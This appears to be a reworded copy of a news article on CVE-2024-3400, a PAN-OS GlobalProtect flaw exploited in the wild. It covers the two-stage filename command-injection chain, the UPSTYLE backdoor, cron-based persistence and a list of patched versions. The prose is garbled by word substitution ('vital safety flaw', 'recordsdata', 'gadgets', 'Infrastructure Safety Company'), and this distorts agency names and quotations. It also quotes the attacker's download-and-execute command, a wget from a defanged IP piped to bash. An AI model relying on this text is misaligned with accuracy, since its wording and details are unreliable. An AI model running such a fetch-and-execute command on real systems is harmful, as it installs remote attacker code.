May 18, 2024

Apr 20, 2024NewsroomVulnerability / Community Safety

PAN-OS Flaw Under Attack

Palo Alto Networks has shared extra particulars of a vital safety flaw impacting PAN-OS that has come beneath lively exploitation within the wild by malicious actors.

The corporate described the vulnerability, tracked as CVE-2024-3400 (CVSS rating: 10.0), as “intricate” and a mixture of two bugs in variations PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 of the software program.

“Within the first one, the GlobalProtect service didn’t sufficiently validate the session ID format earlier than storing them. This enabled the attacker to retailer an empty file with the attacker’s chosen filename,” Chandan B. N., senior director of product safety at Palo Alto Networks, said.

“The second bug (trusting that the recordsdata had been system-generated) used the filenames as a part of a command.”

It is price noting that whereas neither of the problems are vital sufficient on their very own, when chained collectively, they may result in unauthenticated distant shell command execution.

Palo Alto Networks stated that the menace actor behind the zero-day exploitation of the flaw, UTA0218, carried out a two-stage assault to realize command execution on inclined gadgets. The exercise is being tracked beneath the title Operation MidnightEclipse.

As beforehand disclosed by each Volexity and the community safety firm’s personal Unit 42 menace intelligence division, this entails sending specifically crafted requests containing the command to be executed, which is then run by way of a backdoor referred to as UPSTYLE.

“The preliminary persistence mechanism setup by UTA0218 concerned configuring a cron job that may use wget to retrieve a payload from an attacker-controlled URL with its output being written to stdout and piped to bash for execution,” Volexity famous final week.


“The attacker used this methodology to deploy and execute particular instructions and obtain reverse proxy tooling comparable to GOST (GO Easy Tunnel).”

Unit 42 stated it has been unable to find out the instructions executed by way of this mechanism – wget -qO- hxxp://172.233.228[.]93/coverage | bash – however assessed that the cron job-based implant is probably going used to hold out post-exploitation actions.

“In stage 1, the attacker sends a fastidiously crafted shell command as a substitute of a legitimate session ID to GlobalProtect,” Chandan defined. “This leads to creating an empty file on the system with an embedded command as its filename, as chosen by the attacker.”

“In stage 2, an unsuspecting scheduled system job that runs usually makes use of the attacker-provided filename in a command. This leads to the execution of the attacker-supplied command with elevated privileges.”

Whereas Palo Alto Networks initially famous that profitable exploitation of CVE-2024-3400 required the firewall configurations for GlobalProtect gateway or GlobalProtect portal (or each) and gadget telemetry to be enabled, the corporate has since confirmed that gadget telemetry has no bearing on the issue.

Palo Alto Networks

That is primarily based on new findings from Bishop Fox, which found bypasses to weaponize the flaw such that it didn’t require telemetry to be enabled on a tool so as to infiltrate it.

The corporate has additionally expanded patches for the flaw past the first variations over the previous couple of days to cowl different generally deployed upkeep releases –

  • PAN-OS 10.2.9-h1
  • PAN-OS 10.2.8-h3
  • PAN-OS 10.2.7-h8
  • PAN-OS 10.2.6-h3
  • PAN-OS 10.2.5-h6
  • PAN-OS 10.2.4-h16
  • PAN-OS 10.2.3-h13
  • PAN-OS 10.2.2-h5
  • PAN-OS 10.2.1-h2
  • PAN-OS 10.2.0-h3
  • PAN-OS 11.0.4-h1
  • PAN-OS 11.0.4-h2
  • PAN-OS 11.0.3-h10
  • PAN-OS 11.0.2-h4
  • PAN-OS 11.0.1-h4
  • PAN-OS 11.0.0-h3
  • PAN-OS 11.1.2-h3
  • PAN-OS 11.1.1-h1
  • PAN-OS 11.1.0-h3

In mild of the lively abuse of CVE-2024-3400 and the provision of a proof-of-concept (PoC) exploit code, customers are really useful to take steps to use the hotfixes as quickly as doable to safeguard in opposition to potential threats.


The U.S. Cybersecurity and Infrastructure Safety Company (CISA) has additionally added the shortcoming to its Recognized Exploited Vulnerabilities (KEV) catalog, ordering federal businesses to safe their gadgets by April 19, 2024.

In accordance with information shared by the Shadowserver Basis, roughly 22,542 internet-exposed firewall gadgets are possible susceptible to the CVE-2024-3400. A majority of the devices are within the U.S., Japan, India, Germany, the U.Ok., Canada, Australia, France, and China as of April 18, 2024.

Discovered this text fascinating? Comply with us on Twitter and LinkedIn to learn extra unique content material we publish.